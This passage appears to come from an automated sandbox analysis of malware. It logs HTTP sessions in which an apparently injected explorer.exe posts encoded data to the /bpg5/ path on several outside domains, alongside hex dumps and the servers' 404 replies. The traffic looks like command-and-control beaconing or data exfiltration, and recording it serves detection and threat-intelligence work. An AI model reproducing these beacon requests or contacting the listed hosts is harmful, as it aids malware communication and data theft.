44 61 44 5f 47 58 56 67 30 4e 6c 53 63 38 50 73 38 2d 65 30 4c 4d 65 56 47 32 46 4c 6e 32 47 55 72 31 56 36 4d 61 28 66 6f 52 6e 79 6d 77 66 43 63 73 4c 2d 39 59 7a 6c 37 76 75 47 6b 61 44 72 4b 73 4d 52 55 42 57 76 30 43 4a 33 38 49 55 77 45 35 66 4d 71 78 78 4a 72 4d 74 39 50 72 43 59 4a 73 64 31 73 75 68 32 4e 78 7e 54 73 6a 4d 58 5a 71 41 4c 32 38 32 76 39 36 56 6f 39 58 66 75 36 79 39 75 39 4c 76 46 37 57 5a 7a 6f 33 55 77 57 78 37 61 7a 34 73 75 6f 4e 52 4e 71 73 72 50 4d 66 7a 31 44 51 6d 31 6b 6f 58 36 78 48 7e 44 53 41 44 48 66 44 32 68 47 33 38 2d 52 4a 4d 41 61 45 6e 2d 7e 54 59 62 46 71 57 56 4b 6c 4f 4d 76 73 62 6e 78 66 76 37 73 69 6f 76 39 68 58 6b 73 6b 58 66 66 44 59 42 6b 5f 44 57 44 33 37 2d 34 54 6f 44 56 77 38 74 70 64 70 32 47 59 4e 79 35 6e 69 4d 49 44 55 58 72 5f 48 49 30 5a 64 6b 55 41 53 56 59 33 32 6d 53 32 46 7a 6d 74 56 54 39 57 61 76 4d 33 65 4d 4b 4f 58 6b 4a 35 6f 4b 54 59 74 52 6c 76 28 62 61 56 4c 4c 62 62 6d 69 63 57 36 6f 31 76 36 4e 62 45 33 38 38 62 34 71 68 6d 4d 39 66 62 6a 70 66 50 28 66 7e 33 6d 6f 61 4a 49 4b 54 66 54 4b 45 45 7e 58 61 2d 59 55 59 70 68 4f 36 47 58 7a 36 5a 48 76 4a 47 4d 73 58 64 56 79 76 5a 67 2d 73 7a 53 42 48 6e 31 6d 45 54 6d 44 6f 33 63 35 79 50 44 64 79 53 57 2d 75 6e 74 43 6e 61 31 77 33 4c 37 33 51 31 28 77 6f 74 4b 6b 65 48 73 2d 65 65 65 56 55 46 36 75 58 5a 4d 46 6a 79 49 4f 34 43 39 6b 38 67 76 6d 77 45 56 43 79 76 4d 74 39 58 4b 61 4a 49 65 46 36 45 70 4f 37 36 37 51 57 66 34 4b 39 33 35 30 6c 6a 55 46 6f 35 36 75 4d 4c 57 4e 71 72 33 2d 73 59 32 63 30 55 39 5a 33 44 56 4f 6b 6f 4e 73 65 38 70 39 70 63 52 4d 6e 5f 66 55 65 70 68 77 75 59 76 38 31 56 6d 38 75 55 55 76 4d 69 6b 70 45 53 7e 58 6d 46 6b 57 61 63 56 31 42 78 4c 4c 41 6d 4e 57 71 75 4d 77 4e 75 6b 78 67 57 49 79 59 54 4c 6d 38 4f 34 4b 51 6a 6d 30 46 37 4b 69 43 72 38 78 49 4e 36 75 75 76 37 5f 6f 46 66 79 7a 7a 78 70 7e 41 4b 4d 68 63 70 33 35 43 28 6e 32 6d 43 68 72 4c 39 68 76 64 51 64 49 55 6a 2d 75 6f 59 35 6e 31 57 75 72 53 34 39 61 76 41 57 54 36 4a 6f 31 70 56 41 73 33 55 59 68 64 5a 5f 62 2d 72 69 49 46 63 70 70 4d 6d 32 63 6a 58 72 54 42 6d 55 52 4b 5a 6d 52 33 66 5f 73 43 68 42 69 33 74 5a 54 67 69 71 34 4b 61 54 79 7a 76 50 7e 76 48 33 5a 57 6b 52 38 6a 32 42 6f 5a 30 6d 6a 33 39 64 4b 33 68 5f 77 65 66 41 7e 4e 56 56 70 32 32 35 50 31 41 7a 69 55 39 67 53 31 35 63 77 4a 45 5a 67 63 63 4f 45 58 50 65 67 4a 38 38 56 65 6b 6f 49 79 52 68 69 50 49 74 77 4e 6b 52 76 47 48 5f 51 4a 48 64 35 7a 46 6c 45 58 6c 45 41 56 4e 59 49 52 4c 4b 78 32 47 7a 62 38 6f 6b 45 48 57 65 56 76 41 57 71 37 51 38 50 62 61 2d 5a 6f 46 66 49 50 58 62 74 4b 6c 67 35 34 72 56 42 48 4c 6f 35 33 4f 6a 57 61 56 50 66 52 77 57 55 6d 30 33 6f 32 71 61 50 6f 57 5a 75 34 32 48 56 62 52 56 56 4c 50 2d 33 31 68 43 4e 71 61 75 6a 31 55 56 53 4d 77 4e 73 42 51 35 35 68 47 62 30 5f 47 5a 67 39 4a 42 77 42 74 47 56 6d 47 75 30 58 67 36 63 5f 42 63 63 78 5a
                                                    Data Ascii: 8mBWmPn=J3NkxvfAm2TL43~0s8XgRDjXT3RuGkgf20IPxw3e~hN_DcNLe5PO6Nr6CZ33qf18L4NuIBPC6-54(KIoeavIDZJXGwk196WC2UXhEATmhuq9oKJtwhZ-Yqm7mXY7quITsn0GXu496LEP4YJ4YyLModx6oqSn8PV6ueqdph3nPcHEAUW7J9Elc5rJpxURtsRL5YggUs9Lf3Y6Ea6wn6jlq09IX634fcH9dCOGr4RwjEM16Xc8SaWCgdSJpn87UNer6qQWcOSQTg6vmWya9lZw9Uuv6SSMVWAoQMcGPH(-kc3nvbRyW5DmuII16XFMxmUcGtPJUklWCOsLEJ(zuZjRkIlDq6d52g4eY-8q92ZrUFF8embMGVR3HAquRGYCII7ODaD_GXVg0NlSc8Ps8-e0LMeVG2FLn2GUr1V6Ma(foRnymwfCcsL-9Yzl7vuGkaDrKsMRUBWv0CJ38IUwE5fMqxxJrMt9PrCYJsd1suh2Nx~TsjMXZqAL282v96Vo9Xfu6y9u9LvF7WZzo3UwWx7az4suoNRNqsrPMfz1DQm1koX6xH~DSADHfD2hG38-RJMAaEn-~TYbFqWVKlOMvsbnxfv7siov9hXkskXffDYBk_DWD37-4ToDVw8tpdp2GYNy5niMIDUXr_HI0ZdkUASVY32mS2FzmtVT9WavM3eMKOXkJ5oKTYtRlv(baVLLbbmicW6o1v6NbE388b4qhmM9fbjpfP(f~3moaJIKTfTKEE~Xa-YUYphO6GXz6ZHvJGMsXdVyvZg-szSBHn1mETmDo3c5yPDdySW-untCna1w3L73Q1(wotKkeHs-eeeVUF6uXZMFjyIO4C9k8gvmwEVCyvMt9XKaJIeF6EpO767QWf4K9350ljUFo56uMLWNqr3-sY2c0U9Z3DVOkoNse8p9pcRMn_fUephwuYv81Vm8uUUvMikpES~XmFkWacV1BxLLAmNWquMwNukxgWIyYTLm8O4KQjm0F7KiCr8xIN6uuv7_oFfyzzxp~AKMhcp35C(n2mChrL9hvdQdIUj-uoY5n1WurS49avAWT6Jo1pVAs3UYhdZ_b-riIFcppMm2cjXrTBmURKZmR3f_sChBi3tZTgiq4KaTyzvP~vH3ZWkR8j2BoZ0mj39dK3h_wefA~NVVp225P1AziU9gS15cwJEZgccOEXPegJ88VekoIyRhiPItwNkRvGH_QJHd5zFlEXlEAVNYIRLKx2Gzb8okEHWeVvAWq7Q8Pba-ZoFfIPXbtKlg54rVBHLo53OjWaVPfRwWUm03o2qaPoWZu42HVbRVVLP-31hCNqauj1UVSMwNsBQ55hGb0_GZg9JBwBtGVmGu0Xg6c_BccxZudIkVvbFx13qi~NParkQaROKYKhG70PkggZxwKrBKa0Gz~WrCG8lhTLVZdN9IIcSMoBFoZhZD4JKepHY8c4mMPVp12TAvsfhONoY4NDI-~2z_KTZj6q6Psw).
                                                    May 19, 2023 17:52:24.821749926 CEST283INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Fri, 19 May 2023 15:52:24 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Fri, 05 Oct 2018 09:13:39 GMT
                                                    ETag: W/"afe-57777afe91410"
                                                    Content-Encoding: gzip
                                                    Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7 e2 05 6c c7 f5 d7 36 e3 4d ba 31 95 3f b4 8f fa 74 81 87 7a dc ed 23 7e 32 ad 1b 44 7c b6 d7 b6 57 b2 ab f8 cf c4 9f be 02 ca f7 7a d5 37 d6 99 ae 81 06 94 74 21 39 dd 29 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b
                                                    Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r[
                                                    May 19, 2023 17:52:24.821774960 CEST283INData Raw: 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64
                                                    Data Ascii: ,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    15192.168.2.449714183.90.228.4680C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 19, 2023 17:52:36.907072067 CEST284OUTPOST /bpg5/ HTTP/1.1
                                                    Host: www.haynicorpon.biz
                                                    Connection: close
                                                    Content-Length: 189
                                                    Cache-Control: no-cache
                                                    Origin: http://www.haynicorpon.biz
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.haynicorpon.biz/bpg5/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 38 6d 42 57 6d 50 6e 3d 4a 33 4e 6b 78 76 66 41 6d 32 54 4c 34 30 57 30 74 74 58 67 54 6a 6a 58 55 33 52 75 4a 45 67 56 32 30 45 48 78 78 44 4f 7e 57 52 5f 44 4e 39 4c 4c 62 6e 4f 35 4e 72 39 4e 35 32 2d 6b 5f 31 54 4c 34 4e 36 49 44 62 43 36 36 70 34 35 6f 77 6f 59 65 62 50 63 35 4a 43 4e 51 6b 34 39 36 61 68 32 55 4c 71 45 41 37 6d 68 73 7e 39 72 4b 5a 74 32 45 74 2d 4a 4b 6d 48 78 48 59 67 71 75 30 43 73 6e 45 34 58 71 41 39 36 36 49 50 34 6f 70 34 66 6a 4c 4d 39 4e 78 37 77 36 54 79 33 64 45 43 6a 72 37 38 75 69 44 71 4d 70 37 4b 42 31 76 52 4b 77 29 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: 8mBWmPn=J3NkxvfAm2TL40W0ttXgTjjXU3RuJEgV20EHxxDO~WR_DN9LLbnO5Nr9N52-k_1TL4N6IDbC66p45owoYebPc5JCNQk496ah2ULqEA7mhs~9rKZt2Et-JKmHxHYgqu0CsnE4XqA966IP4op4fjLM9Nx7w6Ty3dECjr78uiDqMp7KB1vRKw).
                                                    May 19, 2023 17:52:37.197174072 CEST286INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Fri, 19 May 2023 15:52:37 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Fri, 05 Oct 2018 09:13:39 GMT
                                                    ETag: W/"afe-57777afe91410"
                                                    Content-Encoding: gzip
                                                    Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7 e2 05 6c c7 f5 d7 36 e3 4d ba 31 95 3f b4 8f fa 74 81 87 7a dc ed 23 7e 32 ad 1b 44 7c b6 d7 b6 57 b2 ab f8 cf c4 9f be 02 ca f7 7a d5 37 d6 99 ae 81 06 94 74 21 39 dd 29 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b
                                                    Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r[
                                                    May 19, 2023 17:52:37.197223902 CEST286INData Raw: 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64
                                                    Data Ascii: ,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.44969981.169.145.9380C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 19, 2023 17:51:24.170464993 CEST37OUTPOST /bpg5/ HTTP/1.1
                                                    Host: www.musicandgros.com
                                                    Connection: close
                                                    Content-Length: 189
                                                    Cache-Control: no-cache
                                                    Origin: http://www.musicandgros.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.musicandgros.com/bpg5/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 38 6d 42 57 6d 50 6e 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 45 47 6a 63 44 66 41 65 41 6e 32 52 4b 36 44 75 2d 33 79 74 7a 44 7a 32 52 33 65 78 68 38 72 33 6f 48 70 31 77 77 42 7e 72 53 61 4e 74 68 61 7e 46 49 31 70 55 7a 43 56 76 72 31 79 45 79 7a 68 70 56 69 63 45 4d 49 63 6c 53 72 7e 4c 28 33 65 77 32 51 50 6d 56 37 32 55 42 39 7e 36 33 6f 51 78 7a 78 41 52 68 52 50 4c 72 4e 64 31 6b 59 39 38 41 49 45 63 55 33 7a 39 6a 6f 67 6e 67 54 56 65 4c 47 28 6a 67 30 38 6b 68 30 47 44 45 36 55 79 53 72 38 6e 6b 32 30 58 28 66 34 51 6f 6a 43 6b 31 6a 4d 67 29 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: 8mBWmPn=jKc5GkmqQWJekEGjcDfAeAn2RK6Du-3ytzDz2R3exh8r3oHp1wwB~rSaNtha~FI1pUzCVvr1yEyzhpVicEMIclSr~L(3ew2QPmV72UB9~63oQxzxARhRPLrNd1kY98AIEcU3z9jogngTVeLG(jg08kh0GDE6UySr8nk20X(f4QojCk1jMg).
                                                    May 19, 2023 17:51:24.192460060 CEST37INHTTP/1.1 404 Not Found
                                                    Date: Fri, 19 May 2023 15:51:24 GMT
                                                    Server: Apache/2.4.57 (Unix)
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    3192.168.2.44970081.169.145.9380C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 19, 2023 17:51:26.723347902 CEST38OUTGET /bpg5/?8mBWmPn=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTEx2mn7HsaAaANg==&JBfKk=_uLb4J-vJhW8 HTTP/1.1
                                                    Host: www.musicandgros.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 19, 2023 17:51:26.743776083 CEST38INHTTP/1.1 404 Not Found
                                                    Date: Fri, 19 May 2023 15:51:26 GMT
                                                    Server: Apache/2.4.57 (Unix)
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    4192.168.2.449701198.177.124.5780C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 19, 2023 17:51:32.267709017 CEST41OUTPOST /bpg5/ HTTP/1.1
                                                    Host: www.gomarketing.info
                                                    Connection: close
                                                    Content-Length: 1485
                                                    Cache-Control: no-cache
                                                    Origin: http://www.gomarketing.info
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.gomarketing.info/bpg5/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
